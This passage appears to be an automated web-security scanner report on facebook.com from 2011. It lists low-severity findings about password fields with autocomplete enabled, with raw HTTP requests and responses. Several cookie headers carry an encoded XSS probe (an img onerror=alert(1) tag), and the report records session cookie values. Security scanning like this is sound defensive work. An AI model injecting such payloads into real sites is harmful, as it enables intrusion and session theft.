Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.57. http://www.facebook.com/patroyo

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.58. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.41
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.59. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.60. http://www.facebook.com/plugins/facepile.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /plugins/facepile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.24.112
Connection: close
Date: Thu, 05 May 2011 10:56:40 GMT
Content-Length: 11389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.61. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.115
Connection: close
Date: Thu, 05 May 2011 10:56:43 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.62. http://www.facebook.com/policy.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /policy.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.63. http://www.facebook.com/privacy/explanation.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.64. http://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • http://www.facebook.com/r.php
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.65. http://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • http://www.facebook.com/r.php?locale=en_US
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET /r.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
Connection: close
Date: Thu, 05 May 2011 11:43:09 GMT
Content-Length: 29499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.66. http://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.67. http://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET /r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Bucky-Jordan/100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.27
X-Cnection: close
Date: Thu, 05 May 2011 11:43:18 GMT
Content-Length: 29953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.68. http://www.facebook.com/robynalys

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /robynalys

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
